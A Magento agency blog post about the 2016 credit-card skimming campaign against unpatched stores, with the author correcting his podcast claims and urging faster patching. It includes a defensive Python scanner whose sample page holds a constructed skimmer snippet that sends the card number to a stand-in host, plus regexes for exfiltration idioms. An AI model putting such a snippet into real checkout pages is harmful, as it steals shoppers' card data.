Magento® Security Scare Shows We All Must Make Changes. It’s Time to Come Together. And Increase the Magento® Patch Rate.
Strange times can lead to strange things. And cybersecurity threats are more real now than ever before.
I recently participated in a podcast interview with the good folks at MageTalk regarding a recent cybersecurity fiasco – the skimming of credit card numbers from Magento® Stores. I made a few mistakes here and there. I didn’t get all my facts right. And I forgot to propose a smart solution to the situation.
It happens. Especially in today’s society of instant gratification and immediate communication. It’s easy to be a gasbag. It’s simple to get caught up in the wrong idea or opinion – and chase it down a rabbit hole, or up into the clouds (or cloud).
But I’m not in the excuse-making business. I’m in the business of helping companies and brands build a strong, secure, diverse and profitable eCommerce solution built on the Magento® platform. So please, hear me out. Let me explain myself. And let me then transition into a smart, sharp focus on what we all can do to help make Magento® more secure, moving forward. Because now more than ever, we all need to come together. And work together, to increase the Magento® patch rate.
First, let me detail the situation at hand. Then we can go from explaining the situation…to laying a foundation for the solution.
What Went Wrong…
To sum up this development, Willem de Groot recently published a long list of Magento® stores that had been infected with malware skimming their customers’ credit card numbers.
These stores were infected because known flaws in their Magento® installations had not been patched, and cybercriminals exploited those flaws. The walls were breached. The enemy came inside. And set up shop. Within these online shops.
Unfortunately, the extent of this malware-enabled breach runs far, wide and deep. Multiple criminal groups are involved. The affected merchants were unaware that their customers were being robbed. And online credit card skimming is up an astounding 69 percent since November 2015.
Once an unpatched flaw in the Magento® software has been found and exploited, the attacker installs a JavaScript “wiretap” in the checkout pages. It reads the card details as the customer enters them and funnels that live payment data to a collection server under the attacker’s control, typically hosted offshore. The checkout keeps working normally, so neither the customer nor the merchant notices anything. The skimmed card data is then sold on the “dark web”, typically for $30 or more per card.
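As an added illustration of what that “wiretap” looks like in a page, here is a small scanner written for this post; it is not code from Willem, MageReport, MageTalk or Magento. It takes the rendered HTML of a checkout page plus the list of hosts the merchant legitimately loads scripts from, and flags the two things a skimmer cannot avoid: a script loaded from an origin not on that list, and an inline script that both references the card fields and contains an outbound-request idiom. The sample page, the host names and the indicator lists are constructed for the example.

```python
"""Added example: spotting a checkout "wiretap" in a rendered Magento page.

A skimmer has to do two things: read the card fields, and get the data off
the page. So this scanner flags (a) <script src> tags loaded from an origin
outside the merchant's allow-list and (b) inline scripts that both reference
payment field names and contain an outbound-request idiom. The sample page,
host names and indicator lists are constructed for this example; they are
not taken from any real store or malware sample.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Field names a Magento 1 card form uses (payment[cc_number] etc.) plus a
# few generic ones; a skimmer has to name these to read the card data.
PAYMENT_FIELDS = ("cc_number", "cc_cid", "cc_exp", "cardnumber", "cvv", "cvc")

# Idioms an inline script uses to push data off the page (constructed list).
EXFIL_RE = re.compile(
    r"XMLHttpRequest|\bfetch\s*\(|sendBeacon|\bnew\s+Image\b|\.src\s*=|WebSocket"
)


class _ScriptCollector(HTMLParser):
    """Collect every <script>: external src URLs and inline bodies."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script, self._buf = True, []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False


def script_host(src, page_host):
    """Host a script src loads from; a relative URL is first-party."""
    host = urlparse(src).netloc.lower()
    return host or page_host


def scan_checkout(html, page_host, allowed_hosts):
    """Return (kind, detail) findings for one checkout page's scripts."""
    collector = _ScriptCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for src in collector.external:
        host = script_host(src, page_host)
        if host not in allowed_hosts:
            findings.append(("external-script", host))
    for body in collector.inline:
        reads_card = any(name in body for name in PAYMENT_FIELDS)
        if reads_card and EXFIL_RE.search(body):
            findings.append(("inline-exfil", " ".join(body.split())[:60]))
    return findings


# Constructed sample: the merchant's own scripts, one unexpected third-party
# script, and an inline snippet shaped like a skimmer (NOT real malware).
SAMPLE_PAGE = """
<script src="/js/prototype/prototype.js"></script>
<script src="https://cdn.example-merchant.com/skin/checkout.js"></script>
<script src="https://static.cdn-stats.example/stat.js"></script>
<form id="co-payment-form"><input name="payment[cc_number]"></form>
<script>
document.getElementById('co-payment-form').onsubmit = function () {
  var d = document.getElementsByName('payment[cc_number]')[0].value;
  var i = new Image(); i.src = 'https://static.cdn-stats.example/p.gif?d=' + btoa(d);
};
</script>
"""
SAMPLE_HOST = "shop.example-merchant.com"
SAMPLE_ALLOWED = {SAMPLE_HOST, "cdn.example-merchant.com"}

if __name__ == "__main__":
    for kind, detail in scan_checkout(SAMPLE_PAGE, SAMPLE_HOST, SAMPLE_ALLOWED):
        print(f"{kind}: {detail}")
```

Run it against the checkout HTML as the browser receives it, with the merchant’s own allow-list. It catches the straightforward case only: a skimmer that obfuscates its strings, or that is injected server-side into an existing first-party file, slips past a string match, so treat this as a quick triage check alongside file-integrity monitoring on the server and, above all, applying the patches that close the door in the first place. A Content-Security-Policy that restricts script-src, connect-src and img-src to the same allow-list is the preventive counterpart.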
When Willem posted this list of affected Magento® stores, all hell broke loose, online and off, fuelled by guilt by association, rampant speculation and the instant reactions that spread like wildfire in today’s online world. Willem was harassed by some for publishing the list and berated by others for not publishing it sooner.
What I Said. And Meant to Say…
That’s the gist of it, essentially. To dig deeper into this far-reaching campaign against unpatched Magento® stores, I went on MageTalk and ranted about my opinion further with Kalen and Phillip. In the process, I made a few of those aforementioned mistakes. And I failed to propose any kind of solution to the problem at hand (an oversight which we will soon correct here).
Again, it happens. Nobody’s perfect, certainly not in today’s always-on, forever-finger-pointing society of instant gratification and online crime waves. When you really dig into just how much ground I covered in this interview with Kalen and Phillip, you’ll also see that room for some missteps naturally exists. It’s a wild, wide territory we’re roaming through here – and then again, so is my Imagination.
First and foremost, I want to commend the work that Willem has done. After reading his blog, and hearing the ensuing outrage both for and against the list when it was first posted online, I have a newfound respect for Willem. After the MageTalk episode I had a chat with him. Willem not only gave me his valuable time and insight, but engaged with me in a manner that was professional and respectful. He also helped me realize the errors of my ways, and a few of the mental and verbal missteps I made in my own online adventure.
I commend all the hard work that Willem has done in founding MageReport, and I applaud his PASSION for security concerns and issues when it comes to the Magento® platform.
I also want to make it very clear that any disagreement I may have with Willem’s work regarding this hotly contested recent report involves the method or “style” of how it happened – the “list-making” or “blacklisting” approach that is immediately associated with “naming and shaming” people.
I also want to address some of the false statements or premises I uncorked in my passionate podcast interview. And I want to thank Willem for “setting me straight” here.
*I questioned how accurate the MageReport list is in terms of “false positives”. Willem told me that “when it comes to accuracy, anyone could have validated the list, as I’d shared all the malware samples that I found out in the wild. I had a couple of hundred emails from merchants questioning the accuracy, each of which I verified by hand. I wouldn’t say it’s impossible that a false positive ended up here, but I sure haven’t found any”.
*I mentioned that the “INSECURE” merchant bears the brunt and financial repercussions of the card skimming because they receive a chargeback. This was a flat-out mistake. Long story short, I just didn’t think this one through completely. Willem has. He explained it to me thusly: “the current fraud wave at hand steals payment data, but it doesn’t place fraudulent orders at Magento stores. So the ones who end up paying for the damage are the stores where fraud purchases are made (typically virtual online goods stores and Hong Kong-based physical electronics stores) and/or the customers who either didn’t recognize a fraud transaction on their statement or, in general, are confronted with increased ‘fraud battling’ charges by their banks”. Whoops. This is what happens when you take a Skype call late in the day on a moment’s notice to appear on MageTalk. Kalen should have CC’d me with a show plan ahead of time!
*I mentioned that we just have to assume that most of the businesses on this list are small, or “smaller than small”. After talking to Willem, I quickly learned that this is simply not the case. Or as Willem described it, “absolutely untrue.” In fact, some of these businesses are VERY BIG. Willem told me he got calls from the heads of security at Fortune 500 companies. I won’t name any of those companies here, but they are pretty much the opposite of small businesses. My bad.
*I mentioned on the podcast that I felt “Magento should be reaching out to these customers”. Willem mentioned during our chat that, to his knowledge, Magento® has reached out to these merchants and sent out a notice about reports of a JavaScript malware exploit. I’m not sure to what degree Magento® has communicated with them, but there has obviously been some effort put forth here.
DON’T Run Away…
My biggest concern with this whole situation was that the publishing of this list would scare online merchants and potential merchants away from Magento® entirely – in full and forever.
I mentioned this in my conversation with Willem, and he told me he agreed.
“I would agree here, and publishing this stuff was not a light decision. For context, I was berated by several consumer organizations for not publishing this list earlier. But the damage continues: per day, another 10-90 new stores get fitted with skimming malware.”
Here at Imagination Media, we are a Magento®-driven agency. We have always been big believers in the power of this platform, and we remain committed to finding ways to use Magento® to make everyone more successful and profitable. And speaking of bottom lines, the bottom line here is that fewer merchants using Magento® isn’t good for any of us, from a financial standpoint. Not at all. We all need to remember this. And we all need to come together to find a swift solution to this problem.
Where We Go From Here…
Willem’s method of “list-making” may not have been the best possible option of all available avenues, but it served a valuable and much-needed purpose to all of us in the Magento® community.
Willem got the ball rolling here. As of November 15, 2016, over 2,922 sites have been cleaned up. Now it’s time for us to pick it up. And run with it – all the way across the finish line.
Now more than ever, we need to come together to find an efficient, effective and sensible solution. Now more than ever, we need to “put our money where our mouth is” – and come together as a passionate, intelligent and loyal community of Magento developers.
That process starts with conducting a better overall discussion about this topic. In the wise words of Willem himself:
“We should definitely have a better public discussion on this. Because at the moment, Magento (and Community) are losing the security struggle. Front-end credit card skimming is increasing, patches are getting more complex, leading to fewer people patching. And criminals are shifting to hard-to-detect backend malware.”
As it relates to Magento, this point is a bit sensitive and shaky. But it’s tough to ignore Magento®’s inability to release a security patch that works from the outset and keeps working properly. I understand that Magento® may feel that Community Edition (CE) is open-source software and that they’re doing everyone a favor by releasing a patch at all. But companies that publish open-source software have a responsibility for that software and its security. Magento® has a LOT to gain, and to lose, based on the reputation of its software’s security and performance.
As it relates to agencies, I think it’s important that agencies begin educating their customers on the topic of software and security maintenance. Most of the time, a merchant is guided to choose a platform by a development agency like us. I feel that the agency should also take some initiative in educating their clients on these situations and their overall severity. I’m not saying this is the agencies’ fault. Not at all. I’m simply saying that if we all want to push Magento® as a platform to merchants, we should be active in explaining the vital importance of security.
Two Key Questions…
The final questions I would leave all of us to ponder are these:
I’m sure some of you have already helped in many ways that we just aren’t aware of. But how do we find a way to help Willem continue to make progress on this major cybersecurity issue across the Magento® community and ecosystem?
How do we tap into a community that we all value as one of the strongest of any software platforms, and one of the most unselfish and willing to help, and leverage its powers to fix what is currently broken?
I look forward to finding the answers to these questions soon – working closely with all of you.